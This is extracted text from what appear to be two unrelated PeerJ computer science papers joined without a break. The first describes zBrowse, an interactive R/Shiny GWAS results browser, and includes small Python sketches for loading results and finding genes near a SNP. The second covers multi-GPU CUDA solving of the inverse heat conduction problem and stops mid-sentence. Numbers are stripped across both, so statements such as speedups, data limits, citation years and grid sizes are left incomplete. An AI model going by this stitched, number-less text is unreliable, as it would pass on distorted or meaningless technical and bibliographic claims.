/peerj-cs. / https://peerj.com http://dx.doi.org/ . /app http://dx.doi.org/ . /j.neucom. . . http://dx.doi.org/ . /j.eswa. . . http://dx.doi.org/ . /tmm. . http://dx.doi.org/ . /peerj-cs. zbrowse: an interactive gwas results browser a peer-reviewed version of this preprint was published in peerj on may . view the peer-reviewed version (peerj.com/articles/cs- ), which is the preferred citable publication unless you specifically need to cite this preprint. ziegler gr, hartsock rh, baxter i. . zbrowse: an interactive gwas results browser. peerj computer science :e https://doi.org/ . /peerj-cs. https://doi.org/ . /peerj-cs. https://doi.org/ . /peerj-cs. zbrowse: an interactive gwas results browser greg r ziegler, ryan h hartsock, ivan baxter the growing number of genotyped populations, the advent of high-throughput phenotyping techniques and the development of gwas analysis software has rapidly accelerated the number of gwas experimental results. candidate gene discovery from these results files is often tedious, involving many manual steps searching for genes in windows around a significant snp. this problem rapidly becomes more complex when an analyst wishes to compare multiple gwas studies for pleiotropic or environment specific effects. 
to this end, we have developed a fast and intuitive interactive browser for the viewing of gwas results with a focus on an ability to compare results across multiple traits or experiments. the software can easily be run on a desktop computer with software that bioinformaticians are likely already familiar with. additionally, the software can be hosted or embedded on a server for easy access by anyone with a modern web browser. peerj preprints | https://dx.doi.org/ . /peerj.preprints. v | cc-by . open access | rec: mar , publ: mar p re p ri n ts greg r ziegler  greg.ziegler@ars.usda.gov  united states department of agriculture agricultural research service  st. louis,  missouri,  united states    ryan h hartsock  rhartsock @gmail.com  donald danforth plant science center,  st. louis,  missouri,  united states    ivan baxter  ivan.baxter@ars.usda.gov  united states department of agriculture agricultural research service  st. louis,  missouri,  united states      corresponding author  ivan baxter   n warson rd, st. louis, mo    ( )  ­   ivan.baxter@ars.usda.gov                      peerj preprints | https://dx.doi.org/ . /peerj.preprints. v | cc-by . open access | rec: mar , publ: mar p re p ri n ts mailto:ivan.baxter@ars.usda.gov mailto:ivan.baxter@ars.usda.gov introduction    the recent development of high­throughput plant phenotyping techniques coupled  with the ability to genotype large populations of diverse individuals has revolution­  ized the way that forward genetics research is performed. tools have rapidly become  available to perform genome­wide association studies (gwas) in a variety of  species (kang et al.,  ; segura et al.,  ; lipka et al.,  ) that can map traits to the  genome with high enough resolution to quickly provide a tractable list of potential causal  genes.    one of the first steps an analyst will take is determining what gene or genes fall  under the snp peaks that can be seen on the manhattan plot. unfortunately, these  plots are not interactive and identifying the peaks of interest usually involves sifting through  the results table for the coordinates of the peak of interest and then filtering a large  gene annotation file for a range around the coordinates of the peak. the extra steps  involved in exploring the data in this way makes it more likely that interesting asso­  citations may be missed either due to  ) mistakes made in attempting to mine the large  results files or  ) the dataset not being mined deeply enough due to the difficulty of look­  ing for genes under less significant peaks. additionally, this method quickly  becomes tedious when analyzing multiple phenotypes or relatively complex traits.  some web applications provide tools for viewing manhattan plots interactively, but  they are all either specific to a single species (childs, lisec & walther,  ; li, sham &  wang,  ; seren et al.,  ) or are part of larger software suites that make fast and  straightforward viewing of gwas results difficult (stein et al.,  ). these resources  also do not allow for easy viewing and comparison of gwas results across phenotypes  and studies, a situation that frequently arises with structured populations.    goals    we approached the construction of a new gwas browser with the goal of giving the users the  following tools, all of which were focused on versatility and adaptability:    . 
ability to plot multiple traits in the same panel.​  we wanted to enable users to find  genotype­environment (gxe) interactions (e.g., those instances where an  environmental condition causes a phenotypic effect, but only for individuals with a    peerj preprints | https://dx.doi.org/ . /peerj.preprints. v | cc-by . open access | rec: mar , publ: mar p re p ri n ts given allele) and loci with pleiotropic effects (the same loci affecting multiple  phenotypes)..  . ability to rapidly move between scales (thousands of bps to billions).    . ability to to find overlaps or commonalities among sets.  . ability to interact directly with the plots​. we wanted the ability to look at the  annotations of genes inline easily and link to additional information.  . ability to download plots and gene lists.  . finally, we wanted all of this information and functionality to be available in one  browser window using tools that are common and freely available to the community.      here, we present an interactive gwas results viewer that is an extension of the classic  gwas manhattan plot. it allows for the rapid comparison of gwas results from multiple  phenotyping experiments and the rapid viewing and analysis of genes under peak snps.  arabidopsis thaliana​, maize, soybean, and sorghum are bundled with the software but we  provide instructions and tools to easily add support for other organisms.    user interface    the zbrowse gwas results viewer is an interactive application that runs on a local machine  using r and is rendered in any modern web browser. because the browser runs on the users  local machine, the data will remain private. the focus of the first version is a local installation,  the browser display allows for easy sharing of the application. the browser is designed to be  a streamlined environment that provides fast access to visualization tools to allow the quick  analysis of gwas results. zbrowse utilizes a tab­based navigation format to make accessing  different aspects of the browser fast, efficient, and intuitive. there is also a sidebar panel on  the left of the page that updates with a set of options specific to the tab being displayed.    the first tab in the list, and the landing page when the application is first loaded,  is the manage tab (figure  ). this tab allows a new gwas dataset to be uploaded  into the application or a pre­loaded dataset from a dropdown menu can be selected.  before uploading, the user selects the appropriate organism from a dropdown menu. data  can be uploaded in a flat file delimited with either commas or tabs or an rdata object.    once uploaded, a preview of the first ten rows of the dataset will appear in the  main panel. below this table is a series of selection boxes that allow the user to specify    peerj preprints | https://dx.doi.org/ . /peerj.preprints. v | cc-by . open access | rec: mar , publ: mar p re p ri n ts which columns in the file to use for plotting. the user needs to select a chromosome  and base pair for determining the location of each snp in the genome. if the uploaded  dataset is data from only one gwas trait, there is a checkbox to include all data as  one trait. otherwise, the user can select one or more trait columns to group the data  by when plotting. for example, a researcher might be interested in comparing  gwas results from multiple experiments, or in comparing results from  multiple traits measured in the same experiment, or both. 
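in concrete terms, this column selection simply normalises whatever delimited file the user uploads onto the handful of fields the plots need. the sketch below shows the idea in python/pandas rather than in the r code zbrowse is actually written in; the column names in the example are hypothetical and not a fixed zbrowse schema.

```python
import pandas as pd

def load_gwas_results(path, chrom_col, bp_col, trait_cols, score_col, sep=None):
    """read a comma- or tab-delimited GWAS results file and map the
    user-selected columns onto the fields needed for plotting."""
    df = pd.read_csv(path, sep=sep, engine="python")  # sep=None sniffs ',' vs tab
    out = pd.DataFrame({
        "chrom": df[chrom_col],
        "bp": df[bp_col].astype(int),
        "score": df[score_col],  # e.g. -log10(p), RMIP, or effect size
    })
    # one trait column, or several columns combined into a single trait label
    if len(trait_cols) == 1:
        out["trait"] = df[trait_cols[0]].astype(str)
    else:
        out["trait"] = df[trait_cols].astype(str).apply("/".join, axis=1)
    return out

# hypothetical usage:
# snps = load_gwas_results("nam_results.csv", "chr", "pos",
#                          ["trait", "environment"], "neg_log10_p")
```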
the user simply needs to select the  column or columns with the label for the trait that the snp corresponds to. finally, the user  needs to select the y­axis column with the significance value against which to plot each snp.  usually, this is the negative logarithm of the p­value, but can also be the number of bootstrap  models that include this snp (rmip, valdar et al.,  ) or any other measure of  trait significance, such as effect size. the final parameter allows for user selectable  values for the y­axis scale. by default, the software will automatically scale the y­axis  based on the range of the selected data.    after the user has selected the appropriate parameters, clicking the submit but­  ton will trigger a tab change to the whole genome view visualization tab (figure  ). conveniently, once submitted, the software will remember the selected settings  for this dataset on future visits and automatically populate the fields with the previ­  ously selected parameters. the plot on this tab is formatted as a standard genome­wide  manhattan plot. the x­axis is ordered by chromosome and base pair within each  chromosome. the background of the plot has alternating blue/white shading for the  even and odd chromosomes to highlight chromosome breaks. the panel  on the left contains a box for each trait column selected in the manage tab. each of  these boxes is populated with the values found in that column and any combination  of one to many traits can be selected for viewing on the plot on the right. there is also  an option for showing only overlapping snps with the ability to adjust both the overlap size  around each point and the minimum number of overlaps.    when the user scrolls over points in the plot, a tooltip will display that shows  information about the trait that snp is associated with, the y­axis value, and the  exact chromosome and base pair for the snp (figure  ). if the tooltip gets in the  way of the viewing or selecting of points, clicking the plot will temporarily hide the  tooltip box. clicking any point in the whole genome view will change tabs to the  chromosome view tab (figure  ). this tab contains two plots: one is a chromosome­wide  view displaying the data from the chromosome clicked in the genome­wide view, the other    peerj preprints | https://dx.doi.org/ . /peerj.preprints. v | cc-by . open access | rec: mar , publ: mar p re p ri n ts plot is an annotation plot of the region around the clicked base pair. a blue band  in the chromosome­wide plot highlights the region being displayed in the annotation  plot.  the plot contains a variety of interactive features. in addition to selecting traits  to view in the sidebar panel, traits can be quickly hidden by clicking their entry  in the legend. when many points are plotted on the same graph, overplotting can  make it difficult to discern points clustered around the same peak. to alleviate this,  the plot can be easily zoomed by clicking and dragging a zoom box anywhere in  the plot. this makes it much easier to see the relationship between tightly grouped  points. the displayed chromosome can be changed without returning to the whole  genome view tab using the drop­down menu in the sidebar panel. points can be clicked to  redraw the annotation plot around new points of interest.    the annotation plot is a variable width plot that defaults to showing the region  ,  base pairs on either side of the point of interest. 
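behind this annotation region is a plain interval query: collect the genes whose coordinates overlap a window centred on the clicked snp. a rough python sketch is given below; the record fields and the window size shown are illustrative assumptions, not the browser's r implementation.

```python
def genes_in_window(genes, chrom, bp, window=10000):
    """return annotation records for genes overlapping the region
    [bp - window, bp + window] around a clicked SNP.

    genes: iterable of dicts with 'chrom', 'start', 'end', 'name', 'description'
    """
    lo, hi = bp - window, bp + window
    hits = [g for g in genes
            if g["chrom"] == chrom and g["end"] >= lo and g["start"] <= hi]
    return sorted(hits, key=lambda g: g["start"])

# hypothetical use: genes under a clicked peak on chromosome 5
# table = genes_in_window(annotation_records, "5", 8_450_000, window=10_000)
```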
the width of this region  can be adjusted between  ,  and  ,  base pairs using the slider on the sidebar  panel. the bottom of this plot has a track that shows the position of coding sequences  around the snp of interest. the tooltip for genes in this track displays information  about the gene location, strand, and function, if known. for maize, arabidopsis and  soybean, clicking on the gene will open a new browser tab that links to the gene description  page specific to the organism being viewed. arabidopsis links to the arabidopsis information  resource(tair) (lamesch et al.,  ), soybean links to soybase (grant et al.,  ), and  maize links to the maize genetics and genomics database (maizegdb) (lawrence et al.,  ). in addition, clicking genes in organisms added from phytozome (goodstein et al.,  ) via the add organism application described below opens the phytozome description  page for that gene. zbrowse can be easily modified to link out to other species­specific  databases that can accept a query string in the url.    in addition to the visual browser, annotation data can be explored in tabular form  in the annotation table tab (figure  ). this table provides an interactive table  of the genes found in the window around the selected point. the table is sortable  and searchable and can also be exported as a comma­separated file. a similar table  viewer is available in the data table tab for analysis of the selected gwas dataset.    adding organisms      peerj preprints | https://dx.doi.org/ . /peerj.preprints. v | cc-by . open access | rec: mar , publ: mar p re p ri n ts currently, maize, soybean, arabidopsis and sorghum are downloaded with the browser  source package. we have developed an application to quickly add organisms to the browser  from annotations downloaded from the plant genomics portal (phytozome) to the local  installation of zbrowse. additionally, we will be formatting requested and popular organisms  and releasing the files on github. these will be easy to download and incorporate into your  existing browser installation.    technical foundation    the gwas browser is written in the r programming language using packages  that provide wrappers around popular javascript web applications including shiny (rstudio  inc.,  ) and rcharts (vaidyanathan,  ). because of this, the browser can be run locally  with only r and any modern web browser. internal data processing makes  use of the plyr package (wickham,  ). the javascript plots are drawn using  highcharts (highcharts.com) and are available for use under the creative commons  attribution­noncommercial  .  license. tables are generated using the javascript  library datatables (datatables.net) and xtable (dahl,  ). all of the tools and software used  are either free or open source. the use of r to build the web application makes it more easily  accessible to bioinformaticians to extend than if it was written in pure javascript. many gwas  programs are written in r (kang et al.,  ; segura et al.,  ; lipka et al.,  ). so,  many scientists performing gwas will already have some familiarity with r constructs, even if  they are not computational biologists. this familiarity will hopefully make it easier for the  community who is using the browser to extend it and modify it for their purposes.    limitations    the browser takes a fundamentally different approach from current state of the art  browsers. it is focused on the ability to quickly plot a variety of gwas experiments  on a single manhattan plot. 
a caveat to this ability, however, is that it cannot plot  every snp in a genotype dataset. due to memory, time, and plotting constraints  the current browser is limited to approximately   data points per trait, which  is significantly less than most genotype datasets. of course, only the most strongly  associated snps are typically of interest, so this problem can be easily mitigated  by trimming the input file to contain only significant associations (e.g., p< . ).  future improvements to the browser could support the plotting of more information  by binning points when zoomed out to a point where over plotting is an issue and    peerj preprints | https://dx.doi.org/ . /peerj.preprints. v | cc-by . open access | rec: mar , publ: mar p re p ri n ts only loading individual data points asynchronously when the zoom level is sufficient  to see individual points.    the generality of the browser allows for it to be used with any snp dataset.  only chromosome number and base pair information needs to be provided for each  snp. however, this means that specific information about the genotype dataset being  used, such as minor allele frequency or linkage disequilibrium information, cannot be  displayed on the plot. of course, the flexibility of the browser would make it easy  to build personalized solutions that could display additional information for specific  snp datasets and additional tracks could be added to display linkage disequilibrium  decay around the selected snp.    one obvious extension of the browser that would address many of the limitations listed above  would be to connect it to a database designed to quickly and efficiently handle all of the data  that goes into a gwas experiment. database support would allow custom subsetting of entire  gwas datasets and if the gwas genotype files are available, then summary data about each  particular snp could also be displayed. this would allow the browser to be incorporated into a  much larger ecosystem that could take a gwas experiment from phenotypic dataset, through  running a gwas experiment, to final analysis and visualization.    while the limitations identified above may constrain the use of the browser for certain  applications, there are a number of use cases that are enabled by its current functionality.  using open source tools  and github for the code distribution, the browser functionalities can  be enhanced by the authors or by other members of the user community.      available resources:  download at:  http://www.baxterlab.org/#!/cqi   code is also available on github at  https://github.com/baxterlabzbrowse/zbrowse  manual can be found here:  http://media.wix.com/ugd/ a_ a d deb bd da b c c de ca.pdf  for support email:  baxterlabzbrowse@danforthcenter.org      peerj preprints | https://dx.doi.org/ . /peerj.preprints. v | cc-by . open access | rec: mar , publ: mar p re p ri n ts references    childs lh, lisec j, walther d.  . matapax: an online high­throughput genome­wide  association study pipeline.​ plant physiology​  : – .  dahl db.  .​ xtable: export tables to latex or html​.  goodstein dm, shu s, howson r, neupane r, hayes rd, fazo j, mitros t, dirks w, hellsten  u, putnam n, rokhsar ds.  . phytozome: a comparative platform for green plant  genomics.​ nucleic acids research​  :d –d .  grant d, nelson rt, cannon sb, shoemaker rc.  . soybase, the usda­ars soybean  genetics and genomics database.​ nucleic acids research​  :d –d .  kang hm, zaitlen na, wade cm, kirby a, heckerman d, daly mj, eskin e.  . 
efficient  control of population structure in model organism association mapping.​ genetics  : – .  kang hm, sul jh, service sk, zaitlen na, kong s, freimer nb, sabatti c, eskin e.  .  variance component model to account for sample structure in genome­wide  association studies.​ nature genetics​  : – .  lamesch p, berardini tz, li d, swarbreck d, wilks c, sasidharan r, muller r, dreher k,  alexander dl, garcia­hernandez m, karthikeyan as, lee ch, nelson wd, ploetz l,  singh s, wensel a, huala e.  . the arabidopsis information resource (tair):  improved gene annotation and new tools.​ nucleic acids research​  :d –d .  lawrence cj, dong q, polacco ml, seigfried te, brendel v.  . maizegdb, the  community database for maize genetics and genomics.​ nucleic acids research  :d –d .    peerj preprints | https://dx.doi.org/ . /peerj.preprints. v | cc-by . open access | rec: mar , publ: mar p re p ri n ts lipka ae, tian f, wang q, peiffer j, li m, bradbury pj, gore ma, buckler es, zhang z.  . gapit: genome association and prediction integrated tool.​ bioinformatics  : – .  li mj, sham pc, wang j.  . genetic variant representation, annotation and prioritization  in the post­gwas era.​ cell research​  : – .  rstudio inc.  .​ shiny: web application framework for r​.  segura v, vilhjálmsson bj, platt a, korte a, seren Ü, long q, nordborg m.  . an efficient  multi­locus mixed­model approach for genome­wide association studies in structured  populations.​ nature genetics​  : – .  seren Ü, vilhjálmsson bj, horton mw, meng d, forai p, huang ys, long q, segura v,  nordborg m.  . gwapp: a web application for genome­wide association  mapping in arabidopsis.​ the plant cell online​:tpc. . .  stein ld, mungall c, shu s, caudy m, mangone m, day a, nickerson e, stajich je, harris  tw, arva a, lewis s.  . the generic genome browser: a building block for a  model organism system database.​ genome research​  : – .  vaidyanathan r.  .​ rcharts: interactive charts using polycharts.js​.  valdar w, holmes cc, mott r, flint j.  . mapping in structured populations by resample  model averaging.​ genetics​  : – .  wickham h.  . the split­apply­combine strategy for data analysis.​ journal of statistical  software​  : – .                    peerj preprints | https://dx.doi.org/ . /peerj.preprints. v | cc-by . open access | rec: mar , publ: mar p re p ri n ts         fig.  . landing page for interactive gwas results browser.                                                peerj preprints | https://dx.doi.org/ . /peerj.preprints. v | cc-by . open access | rec: mar , publ: mar p re p ri n ts       fig.  . genome wide view of interactive gwas results browser. the legend at the bottom of  the figure displays the color of points that correspond to the combination of traits and  locations selected in the sidebar on the left hand side of the figure. clicking the points in the  legend allows a user to easily show or hide points from that trait. modincprob=random model  inclusion probability, rmip, the fraction of times each snp displayed was returned out of    gwas analyses performed on a random subset of  % of the data. the title of the plot is  automatically generated from the filename of the dataset provided by the user. this makes it  easy to determine which gwas experiment is being plotted. base pairs = base position along  the chromosome.                                              peerj preprints | https://dx.doi.org/ . /peerj.preprints. v | cc-by . open access | rec: mar , publ: mar p re p ri n ts   fig.  . 
example of tooltip displaying top snp for trait   in a maize nam gwas experiment.  the legend at the bottom of the figure displays the color of points that correspond to the  combination of traits and locations selected in the sidebar on the left hand side of the figure.  clicking the points in the legend allows easily show or hide points from that trait.  modincprob=random model inclusion probability, rmip, the fraction of times each snp  displayed was returned out of   gwas analyses performed on a random subset of  % of  the data. the title of the plot is automatically generated from the filename of the file provided  by the user. this makes it easy to determine which gwas experiment is being plotted.                                                        peerj preprints | https://dx.doi.org/ . /peerj.preprints. v | cc-by . open access | rec: mar , publ: mar p re p ri n ts     fig.  . chromosome view tab of the interactive gwas results browser displaying a peak  above the ion transporter. the legend at the bottom of the figure displays the color of points  that correspond to the combination of traits and locations selected in the sidebar on the left  hand side of the figure. clicking the points in the legend allows a user to easily show or hide  points from that trait. modincprob=random model inclusion probability, rmip, the fraction of  times each snp displayed was returned out of   gwas analyses performed on a random  subset of  % of the data. the title of the plot is automatically generated from the filename of  the dataset provided by the user. this makes it easy to determine which gwas experiment is  being plotted. base pairs = base position along the chromosome.                                    peerj preprints | https://dx.doi.org/ . /peerj.preprints. v | cc-by . open access | rec: mar , publ: mar p re p ri n ts   fig.  . annotation tab of the interactive gwas results browser.    peerj preprints | https://dx.doi.org/ . /peerj.preprints. v | cc-by . open access | rec: mar , publ: mar p re p ri n ts submitted may accepted october published november corresponding author sándor szénási, szenasi.sandor@nik.uni-obuda.hu academic editor miriam leeser additional information and declarations can be found on page doi . /peerj-cs. copyright szénási distributed under creative commons cc-by . open access solving the inverse heat conduction problem using nvlink capable power architecture sándor szénási john von neumann faculty of informatics, Óbuda university, budapest, hungary abstract the accurate knowledge of heat transfer coefficients is essential for the design of precise heat transfer operations. the determination of these values requires inverse heat transfer calculations, which are usually based on heuristic optimisation techniques, like genetic algorithms or particle swarm optimisation. the main bottleneck of these heuristics is the high computational demand of the cost function calculation, which is usually based on heat transfer simulations producing the thermal history of the workpiece at given locations. this direct heat transfer calculation is a well parallelisable process, making it feasible to implement an efficient gpu kernel for this purpose. this paper presents a novel step forward: based on the special requirements of the heuristics solving the inverse problem (executing hundreds of simulations in a parallel fashion at the end of each iteration), it is possible to gain a higher level of parallelism using multiple graphics accelerators. 
the results show that this implementation (running on gpus) is about times faster than a traditional cpu implementation using cores. the latest developments of the gpu-based high power computations area were also analysed, like the new nvlink connection between the host and the devices, which tries to solve the long time existing data transfer handicap of gpu programming. subjects distributed and parallel computing, graphics, scientific computing and simulation, software engineering keywords gpu, cuda, inverse heat conduction problem, heat transfer, parallelisation, data- parallel algorithm, simulation, nvlink, graphics accelerator, optimisation introduction as a fundamental experience of modern materials science, material properties are influenced by the microstructure; therefore, these can be altered to improve the mechanical attributes (oksman et al., ). one of the most widely used methods for this purpose is heat treatment which usually consists of two consecutive steps: heating up the work object to a given high temperature and cooling it down in a precisely controlled environment. it is necessary to know the attributes of the given material and the environment, to achieve the best results, especially the heat transfer coefficient (htc) which shows the amount of heat exchanged between the object and the surrounding cooling medium. the inverse heat conduction problem (ihcp—the determination of the htc) is a typical ill-posed problem (beck, blackwell & clair st, ; alifanov, ; felde, b). without any known analytical solution, most methods are based on the comparison how to cite this article szénási ( ), solving the inverse heat conduction problem using nvlink capable power architecture. peerj comput. sci. :e ; doi . /peerj-cs. https://peerj.com mailto:szenasi.sandor@nik.uni-obuda.hu https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://dx.doi.org/ . /peerj-cs. of temperature signals recorded during real heat treatment processes and estimated by simulations. the aim of these methods is to find the htc function giving the minimal deviation of the measured and predicted temperature data. it is usual to use heuristic algorithms, like genetic algorithms (gas) (szénási & felde, ), particle swarm optimisation (pso) (felde & szénási, ; szénási & felde, ) or some hybrid approaches (felde, a) to find this parameter. kim & baek ( ) presented a hybrid genetic algorithm for the analysis of inverse surface radiation in an axisymmetric cylindrical enclosure. verma & balaji ( ) used a stochastic particle swarm optimization to estimate several parameters in the field of inverse conduction-radiation. both papers have significant contribution in the field of inverse methods. in the case of gas, every chromosome of the population encodes one possible htc function in its genes. these are two-dimensional continuous functions given by the time and location. therefore, a limited number of control points have been used to approximate these ( floating point values per htc). with the already existing direct heat conduction problem (dhcp) solver methods (based on finite-elements or finite-difference techniques), it is feasible to simulate the cooling process and to record the thermal history for each chromosome. the difference between this generated thermal history and the measured one produces the cost value for the individual. 
the purpose of the ihcp process is to find the best gene values resulting in minimal cost. the bottleneck of this process is the high computational demand. the runtime of one cooling process simulation is about ms using one traditional cpu core, and it is necessary to run these simulations for each chromosome in each iteration. assuming a population of , chromosomes and a ga with , iterations, it takes several days to finish the search. furthermore, according to the random behaviour of the ga and the enormously large search space, it is worth running multiple searches. as a result, an overall ihcp process can take many weeks. there are several attempts at using graphics accelerators to speed up physical simulations, and there are several substantial achievements in this field too. satake, yoshimori & suzuki ( ) presented a related method to solve heat conduction equations using the cuda fortran language. they worked out a very well optimised method (analysing the ptx code generated by the compiler), but they only dealt with the one-dimensional unsteady heat conduction equation for temperature distribution. klimeš & Štětina ( ) presented another model using the finite difference method to simulate the three-dimensional heat transfer. their results showed that the gpu implementation is – times faster than the same cpu-based simulation using one tesla c gpu for running kernels. this significant speed up makes it possible to use their method in a real-time fashion. narang, wu & shakur ( ) and narang, wu & shakur ( ) also used programmable graphics hardware to speed up the heat transfer calculations based on a similar finite difference method. they used a quadro fx card, and the speed up was still significant (about × in the case of a large number of nodes). there are also several papers from similar areas. humphrey et al. ( ) and he et al. ( ) have very significant contributions to the field of radiative heat transfer problems. these also show that it is worth implementing gpu codes for physical simulations. szénási ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. the main difference between these studies and this research is that this paper is focusing on the two-dimensional ihcp. heat transfer simulation is a major part of the ihcp solving process; moreover, it is necessary to run thousands of simulations. accordingly, it is feasible to use a higher level of parallelism by using multi-gpu architectures (the presented papers are usually deal with only one device). it is possible to install multiple graphics cards into a standard pc motherboard, and the cuda programming environment can handle all of them. using multiple gpus can double/triple/quadruple the processing power, but it is necessary to adapt the algorithms to this higher level of parallelism. one of the most interesting developments of in htc computing is the result of the ibm and nvidia collaboration, the nvlink high-speed interface between ibm’s power cpus and nvidia’s pascal gpus. data transfer between the host and device memory was an important bottleneck in gpu programming, making several promising applications practically unusable. this high-speed connection and the existence of multiple pascal based graphics cards give developers the ability to accelerate applications more easily. the assumption was that it is worth implementing an ihcp solver system based on this architecture. 
based on these advancements, a novel numerical approach and a massively parallel implementation to estimate the theoretical thermal history are outlined. the rest of the paper is structured as follows: the next section presents the novel parallel dhcp and ihcp solver methods; 'results and discussion' presents the raw results of the benchmarks and the detailed analysis; finally, the last section contains the conclusions and further plans.

materials & methods

direct heat conduction problem

there are various fundamental modes of heat transfer, but this paper deals only with transient conduction, when the temperature of the workpiece changes as a function of time. determining the temperature at any point of the object at any moment often calls for computer-assisted approximation methods. in the case of three-dimensional objects, these calculations can be very complicated and resource intensive, preventing their efficient use as a ga cost function. for cylindrical objects, an essential simplification can significantly decrease the computational effort. as can be seen in fig. , it is enough to model the middle cross-section of the cylinder, resulting in the two-dimensional axis-symmetrical heat conduction model. the radius and the length of the cylinder are denoted by R and Z. the cylinder is subjected to a heat transfer coefficient htc(z,t), varying with the longitudinal local coordinate and with time, on all its surfaces. the thermal conductivity, density and heat capacity all vary with the temperature: k(T), ρ(T) and c_p(T). it has to be noted that phase transformations of the materials applied do not occur during the experiments; therefore, latent heat generation induced by phase transformations is not considered.

figure: two-dimensional axis-symmetrical heat conduction model.

based on this simplified model, the mathematical formulation of the nonlinear transient heat conduction can be described as eq. (1), with the initial and boundary conditions given by eqs. (2)-(5):

$$\frac{\partial}{\partial r}\!\left(k\,\frac{\partial T}{\partial r}\right) + \frac{k}{r}\,\frac{\partial T}{\partial r} + \frac{\partial}{\partial z}\!\left(k\,\frac{\partial T}{\partial z}\right) + q_v = \rho\, c_p\, \frac{\partial T}{\partial t} \quad (1)$$

$$T(r,z,t=0) = T_0 \quad (2)$$

$$k\left.\frac{\partial T}{\partial r}\right|_{0\le z\le Z,\ r=R} = HTC(z,t)\,\bigl[T_q - T(r=R,z,t)\bigr] \quad (3)$$

$$k\left.\frac{\partial T}{\partial z}\right|_{z=0,\ 0\le r<R} = HTC(z=0,t)\,\bigl[T_q - T(r,z=0,t)\bigr] \quad (4)$$

$$k\left.\frac{\partial T}{\partial z}\right|_{z=Z,\ 0\le r<R} = HTC(z=Z,t)\,\bigl[T_q - T(r,z=Z,t)\bigr] \quad (5)$$

where
• r, z—local coordinates;
• t—time;
• R—radius of the workpiece;
• ρ(T)—density of the object;
• T_0—initial temperature of the workpiece;
• T_q—temperature of the cooling medium;
• T(r,z,t)—temperature of the workpiece at a given location/time;
• k(T)—thermal conductivity (varying with temperature);
• case (a)—inner items surrounded by four neighbouring items; • case (b)—inner items at the centre line of the object; • case (c)—boundary items at the outer surface of the object; • case (d)—boundary items at the top surface of the object; • case (e)—boundary items at the bottom surface of the object; • case (f)—boundary item at the outer top corner; • case (g)—boundary item at the inner top corner; • case (h)—boundary item at the outer bottom corner; • case (i)—boundary item at the inner bottom corner. the reliability of the estimated htc strongly depends on the numerical approach applied. during the dhcp calculations, the resolution of the finite grid is essential, parameters n= , m= were used, where n is the number of points horizontally, and m is the number of points vertically. a sufficiently small dt (simulation time interval) value is also necessary to ensure the accuracy of the method (dt = . second). massively parallel solution it is necessary to solve the heat transfer equations for each finite item for the consequent time periods. equations for calculating the heat movement between neighbouring items within the same time can be solved in a parallel fashion because none of these calculations modifies the output of the others. moreover, for several items, the steps of these calculations are the same, only the input parameters are different. this makes it possible to implement an efficient data-parallel algorithm. assuming n×m number of threads, the parallelization level is: • (n− )×(m− ) threads have to calculate case a; • (m− ) threads have to calculate case b; • (m− ) threads have to calculate case c; • (n− ) threads have to calculate case d; • (n− ) threads have to calculate case e; • + + + threads have to calculate case f, g, h and i. based on this data parallel fashion, it is worth implementing a gpu-based implementation. every gpu thread is responsible for one item in the finite grid. the task of these threads is the determination of the temperature in the corresponding location in each consecutive time step. these threads can work in parallel with the equations of the same time step. nevertheless, these are not totally independent, because as an input parameter, threads need the temperature of the neighbouring elements at the previous time step. the threads have to wait until all the others have finished the calculations for the actual period to fulfil this before they can continue working on the next time step. szénási ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. this needs an explicit synchronisation after every time step, and in the cuda framework, the only efficient barrier synchronisation is given by the __syncthreads() function, which synchronises the threads within the same block. according to this, it is necessary to keep all threads working on the same finite grid in the same cuda block. there is an upper limit for the number of threads within a block ( , for current architectures); but, in the case of ordinary configuration, this is not a limiting factor ( · = threads were used). running threads is not sufficient to fully utilise a modern gpu. one p accelerator card has , cuda cores. therefore, this low number of threads leads only a low theoretical occupancy level (number of used cores/number of available cores = / , = . %), and the practical utilisation is expected to be even worse (not to mention, that one server node has four cards installed). 
at this point, recall that this dhcp calculation is responsible for the cost calculation part of a genetic algorithm. a population containing p chromosomes needs p thermal history generations in the evaluation phase of the ga. these are independent calculations, so it is feasible to launch them in a parallel fashion using more than one multiprocessor. given this higher level of parallelism, the required number of threads becomes p times the number of threads used per simulation, which is enough to utilise the computing power of the graphics accelerators fully. this observation is the key point for the multi-gpu implementation. the already mentioned independence makes it possible to distribute these fitness calculations among the available devices. in the case of g gpus, it is worth assigning each chromosome to one of the gpus using eq. (6), which shows the number of assigned chromosomes (P_i) for the ith gpu (where 1 ≤ i ≤ g).

$$P_i = \begin{cases} P-(G-1)\left\lfloor \dfrac{P}{G} \right\rfloor, & \text{if } i = 1\\[4pt] \left\lfloor \dfrac{P}{G} \right\rfloor, & \text{otherwise} \end{cases} \quad (6)$$

further optimisation using shared memory

gpu applications can easily be limited by memory bandwidth issues. data starvation occurs when all threads of a block must wait for loading or storing the actual temperature value of the corresponding finite item. taking advantage of the heterogeneous memory hierarchy makes it feasible to decrease this adverse effect. chromosome data (the htc functions) and the fitness values must reside in the device memory of the gpu because these must be transferred from and to the host. however, during the thermal history generation, it is better to store the actual temperature data of the finite grid in the fast on-chip shared memory. all threads of the block can read and modify these values; therefore, they can read the actual temperature values of the neighbouring elements. the adverse effect of heavy shared memory usage is the limit it places on the number of blocks executing in parallel. the p architecture has kb of shared memory per multiprocessor. float variables are necessary to store the actual values of the grid, requesting only bytes of shared memory per simulation. according to this, even blocks can run in parallel
the solution for this warp divergence is that all threads within a warp must take both branches of the conditional statement; threads with false condition are stalling, while the others are executing the instructions of the true branch, and threads with true condition are stalling, while the others are executing the false branch. these stall phases can significantly decrease the occupancy; hence, warp divergence should be avoided to obtain the best performance. in the case of dhcp calculations, the number of threads is equal to the size of the finite grid (n×m). every thread corresponds to the calculations of one item in the grid, and the first intuition shows that thread indices should be the same as the indices of the corre- sponding finite item. however, this leads to heavy warp divergence; for example, threads of the first warp (identified by indices below) should execute the following code paths (fig. ): • ( , ) thread have to calculate case g; • ( , ) thread have to calculate case f; • ( , )–( , ) threads have to calculate case d; • ( , )–( , ) threads have to calculate case b; • ( , )–( , ) threads have to calculate case c; • ( , )–( , ) and ( , ) threads have to calculate case a. szénási ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. separation of thread indices and the corresponding finite grid locations makes it possible to decrease this divergence significantly. threads inside 